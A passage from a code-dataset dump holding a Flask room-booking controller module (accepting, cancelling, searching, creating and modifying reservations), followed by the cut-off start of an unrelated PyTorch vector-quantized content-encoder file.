RepeatMapping, Reservation\nfrom fossir.modules.rb.models.rooms import Room\nfrom fossir.modules.rb.util import get_default_booking_interval, rb_is_admin\nfrom fossir.modules.rb.views.user.reservations import (WPRoomBookingBookingDetails, WPRoomBookingCalendar,\n WPRoomBookingModifyBooking, WPRoomBookingNewBookingConfirm,\n WPRoomBookingNewBookingSelectPeriod,\n WPRoomBookingNewBookingSelectRoom, WPRoomBookingNewBookingSimple,\n WPRoomBookingSearchBookings, WPRoomBookingSearchBookingsResults)\nfrom fossir.util.date_time import get_datetime_from_request, round_up_to_minutes\nfrom fossir.util.i18n import _\nfrom fossir.util.string import natural_sort_key\nfrom fossir.web.flask.util import url_for\nfrom fossir.web.forms.base import FormDefaults\n\n\nclass RHRoomBookingBookingMixin:\n \"\"\"Mixin that retrieves the booking or fails if there is none.\"\"\"\n def _process_args(self):\n self._reservation = Reservation.get_one(request.view_args['resvID'])\n\n\nclass RHRoomBookingBookingDetails(RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _get_view(self, **kwargs):\n return WPRoomBookingBookingDetails(self, **kwargs)\n\n def _process(self):\n return self._get_view(reservation=self._reservation).display()\n\n\nclass _SuccessUrlDetailsMixin:\n def _get_success_url(self):\n return url_for('rooms.roomBooking-bookingDetails', self._reservation)\n\n\nclass RHRoomBookingAcceptBooking(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_accepted(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def 
_process(self):\n if self._reservation.find_overlapping().filter(Reservation.is_accepted).count():\n raise fossirError(_(u\"This reservation couldn't be accepted due to conflicts with other reservations\"))\n if self._reservation.is_pending:\n self._reservation.accept(session.user)\n flash(_(u'Booking accepted'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingCancelBooking(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_cancelled(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if not self._reservation.is_cancelled and not self._reservation.is_rejected:\n self._reservation.cancel(session.user)\n flash(_(u'Booking cancelled'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingRejectBooking(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n self._reason = request.form.get('reason', u'')\n\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_rejected(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if not self._reservation.is_cancelled and not self._reservation.is_rejected:\n self._reservation.reject(session.user, self._reason)\n flash(_(u'Booking rejected'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingCancelBookingOccurrence(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n occ_date = dateutil.parser.parse(request.view_args['date'], yearfirst=True).date()\n self._occurrence = self._reservation.occurrences.filter(ReservationOccurrence.date == occ_date).one()\n\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_cancelled(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if self._occurrence.is_valid:\n self._occurrence.cancel(session.user)\n flash(_(u'Booking occurrence cancelled'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingRejectBookingOccurrence(_SuccessUrlDetailsMixin, RHRoomBookingBookingMixin, RHRoomBookingBase):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n occ_date = dateutil.parser.parse(request.view_args['date'], yearfirst=True).date()\n self._reason = request.form.get('reason', u'')\n self._occurrence = self._reservation.occurrences.filter(ReservationOccurrence.date == occ_date).one()\n\n def _check_access(self):\n RHRoomBookingBase._check_access(self)\n if not self._reservation.can_be_rejected(session.user):\n raise Forbidden(\"You are not authorized to perform this action\")\n\n def _process(self):\n if self._occurrence.is_valid:\n self._occurrence.reject(session.user, self._reason)\n flash(_(u'Booking occurrence rejected'), 'success')\n return redirect(self._get_success_url())\n\n\nclass RHRoomBookingSearchBookings(RHRoomBookingBase):\n menu_item = 'search_bookings'\n show_blockings = True\n CSRF_ENABLED = False\n\n def _get_form_data(self):\n return request.form\n\n def _filter_displayed_rooms(self, rooms, occurrences):\n return rooms\n\n def _process_args(self):\n self._rooms = sorted(Room.find_all(is_active=True), key=lambda r: 
natural_sort_key(r.full_name))\n self._form_data = self._get_form_data()\n self._form = BookingSearchForm(self._form_data, csrf_enabled=False)\n self._form.room_ids.choices = [(r.id, None) for r in self._rooms]\n\n def _is_submitted(self):\n return self._form.is_submitted()\n\n def _process(self):\n form = self._form\n if self._is_submitted() and form.validate():\n if form.data.get('is_only_my_rooms'):\n form.room_ids.data = [room.id for room in Room.find_all() if room.is_owned_by(session.user)]\n\n occurrences = ReservationOccurrence.find_with_filters(form.data, session.user).all()\n rooms = self._filter_displayed_rooms([r for r in self._rooms if r.id in set(form.room_ids.data)],\n occurrences)\n return WPRoomBookingSearchBookingsResults(self, rooms=rooms, occurrences=occurrences,\n show_blockings=self.show_blockings,\n start_dt=form.start_dt.data, end_dt=form.end_dt.data,\n form=form, form_data=self._form_data,\n menu_item=self.menu_item).display()\n\n my_rooms = [r.id for r in Room.get_owned_by(session.user)]\n return WPRoomBookingSearchBookings(self, errors=form.error_list, rooms=self._rooms, my_rooms=my_rooms,\n form=form).display()\n\n\nclass RHRoomBookingSearchBookingsShortcutBase(RHRoomBookingSearchBookings):\n \"\"\"Base class for searches with predefined criteria\"\"\"\n search_criteria = {}\n show_blockings = False\n\n def _is_submitted(self):\n return True\n\n def _get_form_data(self):\n if request.method == 'POST':\n # Actual form submission (when using the period selector widget)\n return RHRoomBookingSearchBookings._get_form_data(self)\n\n # Class-specific criteria + default times\n data = MultiDict(self.search_criteria)\n data['start_time'] = '00:00'\n data['end_time'] = '23:59'\n data['start_date'] = date.today().strftime('%d/%m/%Y')\n data['end_date'] = (date.today() + timedelta(weeks=1)).strftime('%d/%m/%Y')\n data.setlist('room_ids', [r.id for r in self._rooms])\n return data\n\n\nclass _RoomsWithBookingsMixin:\n def _filter_displayed_rooms(self, rooms, occurrences):\n booked_rooms = {occ.reservation.room_id for occ in occurrences}\n return [r for r in rooms if r.id in booked_rooms]\n\n\nclass _MyRoomsMixin:\n def _filter_displayed_rooms(self, rooms, occurrences):\n return [r for r in rooms if r.is_owned_by(session.user)]\n\n\nclass RHRoomBookingSearchMyBookings(_RoomsWithBookingsMixin, RHRoomBookingSearchBookingsShortcutBase):\n menu_item = 'my_bookings'\n search_criteria = {\n 'is_only_mine': True\n }\n\n\nclass RHRoomBookingSearchBookingsMyRooms(_MyRoomsMixin, RHRoomBookingSearchBookingsShortcutBase):\n menu_item = 'bookings_in_my_rooms'\n search_criteria = {\n 'is_only_my_rooms': True\n }\n\n\nclass RHRoomBookingSearchPendingBookingsMyRooms(_MyRoomsMixin, RHRoomBookingSearchBookingsShortcutBase):\n menu_item = 'prebookings_in_my_rooms'\n search_criteria = {\n 'is_only_my_rooms': True,\n 'is_only_pending_bookings': True\n }\n\n\nclass RHRoomBookingNewBookingBase(RHRoomBookingBase):\n DEFAULT_START_TIME_PRECISION = 15 # minutes\n DEFAULT_BOOKING_DURATION = 90 # minutes\n\n def _make_confirm_form(self, room, step=None, defaults=None, form_class=NewBookingConfirmForm):\n # Note: ALWAYS pass defaults as a kwargs! 
For-Event room booking depends on it!\n # Step 3\n # If we come from a successful step 2 we take default values from that step once again\n if step == 2:\n defaults.used_equipment = [] # wtforms bug; avoid `foo in None` check\n form = form_class(formdata=MultiDict(), obj=defaults)\n else:\n form = form_class(obj=defaults)\n\n if not room.notification_for_assistance:\n del form.needs_assistance\n\n can_book = room.can_be_booked(session.user)\n can_prebook = room.can_be_prebooked(session.user)\n if room.is_auto_confirm or (not can_prebook or (can_book and room.can_be_booked(session.user, True))):\n # The user has actually the permission to book (not just because he's an admin)\n # Or he simply can't even prebook the room\n del form.submit_prebook\n if not can_book:\n # User can only prebook\n del form.submit_book\n\n form.used_equipment.query = room.find_available_vc_equipment()\n return form\n\n def _get_all_conflicts(self, room, form, reservation_id=None):\n conflicts = defaultdict(list)\n pre_conflicts = defaultdict(list)\n\n candidates = ReservationOccurrence.create_series(form.start_dt.data, form.end_dt.data,\n (form.repeat_frequency.data, form.repeat_interval.data))\n occurrences = ReservationOccurrence.find_overlapping_with(room, candidates, reservation_id).all()\n\n for cand in candidates:\n for occ in occurrences:\n if cand.overlaps(occ):\n if occ.reservation.is_accepted:\n conflicts[cand].append(occ)\n else:\n pre_conflicts[cand].append(occ)\n\n return conflicts, pre_conflicts\n\n def _get_all_occurrences(self, room_ids, form, flexible_days=0, reservation_id=None):\n start_dt = form.start_dt.data\n end_dt = form.end_dt.data\n repeat_frequency = form.repeat_frequency.data\n repeat_interval = form.repeat_interval.data\n day_start_dt = datetime.combine(start_dt.date(), time())\n day_end_dt = datetime.combine(end_dt.date(), time(23, 59))\n flexible_start_dt = day_start_dt - timedelta(days=flexible_days)\n flexible_end_dt = day_end_dt + timedelta(days=flexible_days)\n\n occurrences = ReservationOccurrence.find(\n Reservation.room_id.in_(room_ids),\n Reservation.id != reservation_id,\n ReservationOccurrence.start_dt >= flexible_start_dt,\n ReservationOccurrence.end_dt <= flexible_end_dt,\n ReservationOccurrence.is_valid,\n _join=ReservationOccurrence.reservation,\n _eager=ReservationOccurrence.reservation\n ).options(ReservationOccurrence.NO_RESERVATION_USER_STRATEGY).all()\n\n candidates = {}\n for days in xrange(-flexible_days, flexible_days + 1):\n offset = timedelta(days=days)\n series_start = start_dt + offset\n series_end = end_dt + offset\n if series_start < flexible_start_dt:\n continue\n candidates[series_start, series_end] = ReservationOccurrence.create_series(series_start, series_end,\n (repeat_frequency,\n repeat_interval))\n return occurrences, candidates\n\n def _create_booking(self, form, room):\n if 'submit_book' in form and 'submit_prebook' in form:\n # Admins have the choice\n prebook = form.submit_prebook.data\n else:\n # Otherwise the existence of the book submit button means the user can book\n prebook = 'submit_book' not in form\n reservation = Reservation.create_from_data(room, form.data, session.user, prebook)\n db.session.add(reservation)\n db.session.flush()\n return reservation\n\n def _get_success_url(self, booking):\n return url_for('rooms.roomBooking-bookingDetails', booking)\n\n def _create_booking_response(self, form, room):\n \"\"\"Creates the booking and returns a JSON response.\"\"\"\n try:\n booking = self._create_booking(form, room)\n except 
NoReportError as e:\n db.session.rollback()\n return jsonify(success=False, msg=unicode(e))\n flash(_(u'Pre-Booking created') if booking.is_pending else _(u'Booking created'), 'success')\n return jsonify(success=True, url=self._get_success_url(booking))\n\n def _validate_room_booking_limit(self, form, booking_limit_days):\n day_start_dt = datetime.combine(form.start_dt.data.date(), time())\n day_end_dt = datetime.combine(form.end_dt.data.date(), time(23, 59))\n selected_period_days = (day_end_dt - day_start_dt).days\n return selected_period_days <= booking_limit_days\n\n\nclass RHRoomBookingNewBookingSimple(RHRoomBookingNewBookingBase):\n def _process_args(self):\n self._room = Room.get(int(request.view_args['roomID']))\n if self._room is None:\n raise NotFound(u'This room does not exist')\n\n def _make_form(self):\n start_date = None\n force_today = False\n if 'start_date' in request.args:\n force_today = True\n try:\n start_date = datetime.strptime(request.args['start_date'], '%Y-%m-%d').date()\n except ValueError:\n pass\n else:\n if not self._room.check_advance_days(start_date, user=session.user, quiet=True):\n start_date = date.today()\n flash(_(u\"This room cannot be booked at the desired date, using today's date instead.\"), 'warning')\n\n self.past_date = start_date is not None and start_date < date.today()\n if start_date is None or start_date <= date.today():\n start_dt, end_dt, self.date_changed = get_default_booking_interval(\n duration=self.DEFAULT_BOOKING_DURATION,\n precision=self.DEFAULT_START_TIME_PRECISION,\n force_today=force_today\n )\n self.date_changed = self.date_changed and not self.past_date\n else:\n start_dt = datetime.combine(start_date, Location.working_time_start)\n end_dt = datetime.combine(start_date, Location.working_time_end)\n self.date_changed = False\n defaults = FormDefaults(room_id=self._room.id,\n start_dt=start_dt,\n end_dt=end_dt)\n return self._make_confirm_form(self._room, defaults=defaults, form_class=NewBookingSimpleForm)\n\n def _get_view(self, **kwargs):\n return WPRoomBookingNewBookingSimple(self, **kwargs)\n\n def _process(self):\n room = self._room\n rooms = Room.find_all()\n form = self._make_form()\n\n if form.is_submitted() and not form.validate():\n occurrences = {}\n candidates = {}\n conflicts = {}\n pre_conflicts = {}\n only_conflicts = False\n else:\n occurrences, candidates = self._get_all_occurrences([self._room.id], form)\n conflicts, pre_conflicts = self._get_all_conflicts(self._room, form)\n candidate_days = {occ.date for candidate in candidates.itervalues() for occ in candidate}\n conflicting_days = {occ.date for occ in conflicts.iterkeys()}\n only_conflicts = candidate_days <= conflicting_days\n\n if form.validate_on_submit() and not form.submit_check.data:\n booking_limit_days = room.booking_limit_days or rb_settings.get('booking_limit')\n if not self._validate_room_booking_limit(form, booking_limit_days):\n msg = (_(u'Bookings for the room \"{}\" may not be longer than {} days')\n .format(room.name, booking_limit_days))\n return jsonify(success=False, url=url_for('rooms.room_book', room), msg=msg)\n return self._create_booking_response(form, room)\n\n can_override = room.can_be_overridden(session.user)\n return self._get_view(form=form,\n room=room,\n rooms=rooms,\n occurrences=occurrences,\n candidates=candidates,\n conflicts=conflicts,\n only_conflicts=only_conflicts,\n pre_conflicts=pre_conflicts,\n start_dt=form.start_dt.data,\n end_dt=form.end_dt.data,\n repeat_frequency=form.repeat_frequency.data,\n 
repeat_interval=form.repeat_interval.data,\n can_override=can_override,\n past_date=not form.is_submitted() and self.past_date,\n date_changed=not form.is_submitted() and self.date_changed).display()\n\n\nclass RHRoomBookingCloneBooking(RHRoomBookingBookingMixin, RHRoomBookingNewBookingSimple):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n\n # use 'room' if passed through GET\n room_id = request.args.get('room', None)\n\n if room_id is None:\n # otherwise default to reservation's\n self._room = self._reservation.room\n else:\n self._room = Room.get(int(room_id))\n\n if self._room is None:\n raise NotFound(u'This room does not exist')\n\n def _get_view(self, **kwargs):\n return RHRoomBookingNewBookingSimple._get_view(self, clone_booking=self._reservation, **kwargs)\n\n def _update_datetime(self):\n \"\"\"Make necessary changes to reservation's start and end datetime.\n\n Move the start date to the current day, adjust the end date\n accordingly and if the start datetime is still in the past, change the\n start and end time to the current (rounded up) time.\n\n :return: A dict with the new start and end datetime\n \"\"\"\n reservation_duration = self._reservation.end_dt - self._reservation.start_dt\n date_delta = date.today() - self._reservation.start_dt.date()\n start_dt = self._reservation.start_dt + date_delta\n end_dt = start_dt + reservation_duration\n if start_dt < datetime.now():\n new_start_dt = round_up_to_minutes(datetime.now(), 15) + timedelta(minutes=15)\n time_delta = new_start_dt - start_dt\n start_dt = new_start_dt\n end_dt = end_dt + time_delta\n return {'start_dt': start_dt, 'end_dt': end_dt}\n\n def _make_form(self):\n self.past_date = self.date_changed = False\n changes = {'room_id': self._room.id}\n changes.update(self._update_datetime())\n\n if self._reservation.created_by_user != session.user:\n # if the user is cloning someone else's booking, set him/her as booked_for\n changes.update(booked_for_user=session.user,\n booked_for_name=session.user.full_name,\n contact_email=session.user.email,\n contact_phone=session.user.phone)\n\n defaults = FormDefaults(self._reservation,\n skip_attrs=set(changes),\n **changes)\n\n return self._make_confirm_form(self._room, defaults=defaults, form_class=NewBookingSimpleForm)\n\n\nclass RHRoomBookingNewBooking(RHRoomBookingNewBookingBase):\n def _process_args(self):\n try:\n self._step = int(request.form.get('step', 1))\n except ValueError:\n self._step = 1\n\n def _get_view(self, view, **kwargs):\n views = {'select_room': WPRoomBookingNewBookingSelectRoom,\n 'select_period': WPRoomBookingNewBookingSelectPeriod,\n 'confirm': WPRoomBookingNewBookingConfirm}\n return views[view](self, **kwargs)\n\n def _get_select_room_form_defaults(self):\n start_dt, end_dt, date_changed = get_default_booking_interval(duration=self.DEFAULT_BOOKING_DURATION,\n precision=self.DEFAULT_START_TIME_PRECISION,\n force_today=False)\n return FormDefaults(start_dt=start_dt, end_dt=end_dt), date_changed\n\n def _make_select_room_form(self):\n # Step 1\n self._rooms = sorted(Room.find_all(is_active=True), key=lambda r: natural_sort_key(r.full_name))\n form_obj, self.date_changed = self._get_select_room_form_defaults()\n form = NewBookingCriteriaForm(obj=form_obj)\n form.room_ids.choices = [(r.id, None) for r in self._rooms]\n return form\n\n def _make_select_period_form(self, defaults=None):\n # Step 2\n # If we come from a successful step 1 submission we use the default values provided by that step.\n if self._step == 1:\n return 
NewBookingPeriodForm(formdata=MultiDict(), obj=defaults)\n else:\n return NewBookingPeriodForm()\n\n def _show_confirm(self, room, form, step=None, defaults=None):\n # form can be PeriodForm or Confirmform depending on the step we come from\n if step == 2:\n confirm_form = self._make_confirm_form(room, step, defaults=defaults)\n else:\n # Step3 => Step3 due to an error in the form\n confirm_form = form\n\n conflicts, pre_conflicts = self._get_all_conflicts(room, form)\n repeat_msg = RepeatMapping.get_message(form.repeat_frequency.data, form.repeat_interval.data)\n return self._get_view('confirm', form=confirm_form, room=room, start_dt=form.start_dt.data,\n end_dt=form.end_dt.data, repeat_frequency=form.repeat_frequency.data,\n repeat_interval=form.repeat_interval.data, repeat_msg=repeat_msg, conflicts=conflicts,\n pre_conflicts=pre_conflicts, errors=confirm_form.error_list).display()\n\n def _process_select_room(self):\n # Step 1: Room(s), dates, repetition selection\n form = self._make_select_room_form()\n if form.validate_on_submit():\n flexible_days = form.flexible_dates_range.data\n day_start_dt = datetime.combine(form.start_dt.data.date(), time())\n day_end_dt = datetime.combine(form.end_dt.data.date(), time(23, 59))\n selected_rooms = [r for r in self._rooms if r.id in form.room_ids.data]\n selected_period_days = (day_end_dt - day_start_dt).days\n for room in selected_rooms:\n booking_limit_days = room.booking_limit_days or rb_settings.get('booking_limit')\n if selected_period_days > booking_limit_days:\n flash(_(u'Bookings for the room \"{}\" may not be longer than {} days')\n .format(room.name, booking_limit_days), 'error')\n return redirect(url_for('rooms.book'))\n occurrences, candidates = self._get_all_occurrences(form.room_ids.data, form, flexible_days)\n period_form_defaults = FormDefaults(repeat_interval=form.repeat_interval.data,\n repeat_frequency=form.repeat_frequency.data)\n period_form = self._make_select_period_form(period_form_defaults)\n\n # Show step 2 page\n return self._get_view('select_period', rooms=selected_rooms, occurrences=occurrences, candidates=candidates,\n start_dt=day_start_dt, end_dt=day_end_dt, period_form=period_form, form=form,\n repeat_frequency=form.repeat_frequency.data,\n repeat_interval=form.repeat_interval.data, flexible_days=flexible_days).display()\n\n # GET or form errors => show step 1 page\n return self._get_view('select_room', errors=form.error_list, rooms=self._rooms, form=form,\n my_rooms=[r.id for r in Room.get_owned_by(session.user)],\n max_room_capacity=Room.max_capacity, can_override=rb_is_admin(session.user),\n date_changed=not form.is_submitted() and self.date_changed, ).display()\n\n def _process_select_period(self):\n form = self._make_select_period_form()\n if form.is_submitted():\n # Errors in here are only caused by users messing with the submitted data so it's not\n # worth making the code more complex to show the errors nicely on the originating page.\n # Doing so would be very hard anyway as we don't keep all data necessary to show step 2\n # when it's not a step 1 form submission.\n if not form.validate():\n raise fossirError(u'
\\n'.join(form.error_list))\n room = Room.get(form.room_id.data)\n if not room:\n raise fossirError(u'Invalid room')\n # Show step 3 page\n confirm_form_defaults = FormDefaults(form.data)\n return self._show_confirm(room, form, self._step, confirm_form_defaults)\n\n def _process_confirm(self):\n # The form needs the room to create the equipment list, so we need to get it \"manually\"...\n room = Room.get(int(request.form['room_id']))\n form = self._make_confirm_form(room)\n if not room.can_be_booked(session.user) and not room.can_be_prebooked(session.user):\n raise Forbidden('You cannot book this room')\n if form.validate_on_submit():\n return self._create_booking_response(form, room)\n # There was an error in the form\n return self._show_confirm(room, form)\n\n def _process(self):\n if self._step == 1:\n return self._process_select_room()\n elif self._step == 2:\n return self._process_select_period()\n elif self._step == 3:\n return self._process_confirm()\n else:\n return redirect(url_for('rooms.book'))\n\n\nclass RHRoomBookingModifyBooking(RHRoomBookingBookingMixin, RHRoomBookingNewBookingBase):\n def _check_access(self):\n if not self._reservation.can_be_modified(session.user):\n raise Forbidden\n\n def _get_view(self, **kwargs):\n return WPRoomBookingModifyBooking(self, **kwargs)\n\n def _get_success_url(self):\n return url_for('rooms.roomBooking-bookingDetails', self._reservation)\n\n def _process(self):\n room = self._reservation.room\n form = ModifyBookingForm(obj=self._reservation,\n old_start_dt=self._reservation.start_dt, old_end_dt=self._reservation.end_dt)\n form.used_equipment.query = room.find_available_vc_equipment()\n\n if not room.notification_for_assistance and not self._reservation.needs_assistance:\n del form.needs_assistance\n\n invalid_form = form.is_submitted() and not form.validate()\n if invalid_form:\n occurrences = {}\n candidates = {}\n conflicts = {}\n pre_conflicts = {}\n else:\n occurrences, candidates = self._get_all_occurrences([room.id], form, reservation_id=self._reservation.id)\n conflicts, pre_conflicts = self._get_all_conflicts(room, form, self._reservation.id)\n\n if form.validate_on_submit() and not form.submit_check.data:\n try:\n booking_limit_days = room.booking_limit_days or rb_settings.get('booking_limit')\n if not self._validate_room_booking_limit(form, booking_limit_days):\n msg = (_(u'Bookings for the room \"{}\" may not be longer than {} days')\n .format(room.name, booking_limit_days))\n return jsonify(success=False, url=url_for('rooms.roomBooking-modifyBookingForm', self._reservation),\n msg=msg)\n self._reservation.modify(form.data, session.user)\n flash(_(u'Booking updated'), 'success')\n except NoReportError as e:\n db.session.rollback()\n return jsonify(success=False, msg=unicode(e))\n return jsonify(success=True, url=self._get_success_url())\n\n elif invalid_form and not form.submit_check.data and request.is_xhr:\n return jsonify(success=False, msg='\\n'.join(form.error_list))\n\n return self._get_view(form=form, room=room, rooms=Room.find_all(), occurrences=occurrences,\n candidates=candidates, conflicts=conflicts, pre_conflicts=pre_conflicts,\n start_dt=form.start_dt.data, end_dt=form.end_dt.data, only_conflicts=False,\n repeat_frequency=form.repeat_frequency.data, repeat_interval=form.repeat_interval.data,\n reservation=self._reservation,\n can_override=room.can_be_overridden(session.user)).display()\n\n\nclass RHRoomBookingCalendar(RHRoomBookingBase):\n MAX_DAYS = 365 * 2\n\n def _process_args(self):\n today = datetime.now().date()\n 
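# Editor's sketch (hedged assumption, not in the original source): get_datetime_from_request is assumed\n # to read 'start_date'/'start_time'-style request args with the given prefix and fall back to the\n # supplied default, so a bare GET shows [today 00:00, today 23:59]. The overload guard below then\n # rejects oversized windows, e.g. start_date=2016-01-01, end_date=2019-01-01 -> period.days > MAX_DAYS.\n 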
self.start_dt = get_datetime_from_request('start_', default=datetime.combine(today, time(0, 0)))\n self.end_dt = get_datetime_from_request('end_', default=datetime.combine(self.start_dt.date(), time(23, 59)))\n period = self.end_dt.date() - self.start_dt.date() + timedelta(days=1)\n self._overload = period.days > self.MAX_DAYS\n\n def _process(self):\n if self._overload:\n rooms = []\n occurrences = []\n else:\n rooms = Room.find_all(is_active=True)\n occurrences = (ReservationOccurrence\n .find(Reservation.room_id.in_(room.id for room in rooms),\n ReservationOccurrence.start_dt >= self.start_dt,\n ReservationOccurrence.end_dt <= self.end_dt,\n ReservationOccurrence.is_valid,\n _join=ReservationOccurrence.reservation,\n _eager=ReservationOccurrence.reservation)\n .options(ReservationOccurrence.NO_RESERVATION_USER_STRATEGY)\n .all())\n\n return WPRoomBookingCalendar(self, rooms=rooms, occurrences=occurrences, start_dt=self.start_dt,\n end_dt=self.end_dt, overload=self._overload, max_days=self.MAX_DAYS).display()\n","sub_path":"fossir/modules/rb/controllers/user/reservations.py","file_name":"reservations.py","file_ext":"py","file_size_in_byte":33073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"620064075","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n# import tsensor\nfrom model.layers import ConvNorm\n \n# RuntimeError: Given groups=1, weight of size 128 512 1, \n# expected input[16, 406, 80] to have 512 channels, but got 406 channels instead \ndef pad_layer(inp, layer, pad_type='reflect'):\n kernel_size = layer.kernel_size[0]\n # print(\"kernel_size\", kernel_size) # 1\n if kernel_size % 2 == 0:\n pad = (kernel_size//2, kernel_size//2 - 1)\n else:\n pad = (kernel_size//2, kernel_size//2)\n # print(\"pad shape\", pad) #(0,0)\n # print(\"before padding, inp shape\", inp.size())\n # padding\n inp = F.pad(inp, \n pad=pad,\n mode=pad_type)\n # print(\"after padding, inp shape\", inp.size()) \n out = layer(inp)\n return out\n \ndef get_act(act):\n if act == 'relu':\n return nn.ReLU()\n elif act == 'lrelu':\n return nn.LeakyReLU()\n else:\n return nn.ReLU() \ndef conv_bank(x, module_list, act, pad_type='reflect'):\n outs = []\n for layer in module_list:\n out = act(pad_layer(x, layer, pad_type))\n outs.append(out)\n out = torch.cat(outs + [x], dim=1)\n return out\n\nclass VQEmbeddingEMA(nn.Module):\n '''\n reference from: https://github.com/bshall/VectorQuantizedCPC/blob/master/model.py\n '''\n def __init__(self, n_embeddings, embedding_dim, commitment_cost=0.25, decay=0.999, epsilon=1e-5):\n super(VQEmbeddingEMA, self).__init__()\n self.commitment_cost = commitment_cost\n self.decay = decay\n self.epsilon = epsilon\n\n init_bound = 1 / 512\n embedding = torch.Tensor(n_embeddings, embedding_dim)\n embedding.uniform_(-init_bound, init_bound)\n self.register_buffer(\"embedding\", embedding) # only change during forward\n self.register_buffer(\"ema_count\", torch.zeros(n_embeddings))\n self.register_buffer(\"ema_weight\", self.embedding.clone())\n\n def inference(self, x):\n M, D = self.embedding.size()\n x_flat = x.detach().reshape(-1, D)\n\n distances = torch.addmm(torch.sum(self.embedding ** 2, dim=1) +\n torch.sum(x_flat ** 2, dim=1, keepdim=True),\n x_flat, self.embedding.t(),\n alpha=-2.0, beta=1.0)\n\n indices = torch.argmin(distances.float(), dim=-1)\n quantized = F.embedding(indices, self.embedding)\n quantized = quantized.view_as(x)\n residual = x - quantized\n return quantized, residual, 
indices.view(x.size(0), x.size(1))\n\n def forward(self, x):\n M, D = self.embedding.size()\n x_flat = x.detach().reshape(-1, D)\n\n distances = torch.addmm(torch.sum(self.embedding ** 2, dim=1) +\n torch.sum(x_flat ** 2, dim=1, keepdim=True),\n x_flat, self.embedding.t(),\n alpha=-2.0, beta=1.0) # calculate the distance between each ele in embedding and x\n\n indices = torch.argmin(distances.float(), dim=-1)\n encodings = F.one_hot(indices, M).float()\n quantized = F.embedding(indices, self.embedding)\n quantized = quantized.view_as(x)\n\n if self.training: # EMA based codebook learning\n self.ema_count = self.decay * self.ema_count + (1 - self.decay) * torch.sum(encodings, dim=0)\n\n n = torch.sum(self.ema_count)\n self.ema_count = (self.ema_count + self.epsilon) / (n + M * self.epsilon) * n\n\n dw = torch.matmul(encodings.t(), x_flat)\n self.ema_weight = self.decay * self.ema_weight + (1 - self.decay) * dw\n\n self.embedding = self.ema_weight / self.ema_count.unsqueeze(-1)\n\n e_latent_loss = F.mse_loss(x, quantized.detach())\n loss = self.commitment_cost * e_latent_loss\n \n residual = x - quantized\n \n quantized = x + (quantized - x).detach()\n\n avg_probs = torch.mean(encodings, dim=0)\n perplexity = torch.exp(-torch.sum(avg_probs * torch.log(avg_probs + 1e-10)))\n\n return quantized, residual, loss, perplexity\n\n\n# conten encoder from https://github.com/jjery2243542/adaptive_voice_conversion \n# + vq from https://github.com/bshall/VectorQuantizedCPC/blob/master/model.py\n\nclass ContentEncoder(nn.Module):\n def __init__(self, preprocess_config, model_config):\n super(ContentEncoder, self).__init__()\n self.n_conv_blocks = model_config[\"content_encoder\"][\"n_conv_blocks\"]\n self.subsample = model_config[\"content_encoder\"][\"subsample\"]\n self.act = get_act(model_config[\"content_encoder\"][\"act\"]) #'relu'\n self.c_in = model_config[\"content_encoder\"][\"c_in\"]\n self.c_h = model_config[\"content_encoder\"][\"c_h\"]\n self.c_out= model_config[\"content_encoder\"][\"c_out\"]\n self.kernel_size= model_config[\"content_encoder\"][\"kernel_size\"]\n self.bank_size= model_config[\"content_encoder\"][\"bank_size\"]\n self.bank_scale= model_config[\"content_encoder\"][\"bank_scale\"]\n self.c_bank= model_config[\"content_encoder\"][\"c_bank\"]\n self.subsample= model_config[\"content_encoder\"][\"subsample\"]\n self.dropout_rate= model_config[\"content_encoder\"][\"dropout_rate\"]\n ####### vq layer ######\n self.n_embeddings = model_config[\"content_encoder\"][\"VQencoder\"][\"n_embeddings\"]\n self.z_dim = model_config[\"content_encoder\"][\"VQencoder\"][\"z_dim\"]\n self.c_dim = model_config[\"content_encoder\"][\"VQencoder\"][\"c_dim\"]\n\n\n self.conv_bank = nn.ModuleList(\n [nn.Conv1d(self.c_in, self.c_bank, kernel_size=k) for k in range(self.bank_scale, self.bank_size + 1, self.bank_scale)])\n in_channels = self.c_bank * (self.bank_size // self.bank_scale) + self.c_in\n self.in_conv_layer = nn.Conv1d(in_channels, self.c_h, kernel_size=1)\n self.first_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size) for _ \\\n in range(self.n_conv_blocks)])\n self.second_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size, stride=sub) \n for sub, _ in zip(self.subsample, range(self.n_conv_blocks))])\n self.norm_layer = nn.InstanceNorm1d(self.c_h, affine=False)\n self.dropout_layer = nn.Dropout(p=self.dropout_rate)\n\n self.codebook = VQEmbeddingEMA(self.n_embeddings, self.z_dim)\n self.rnn = nn.LSTM(self.z_dim, 
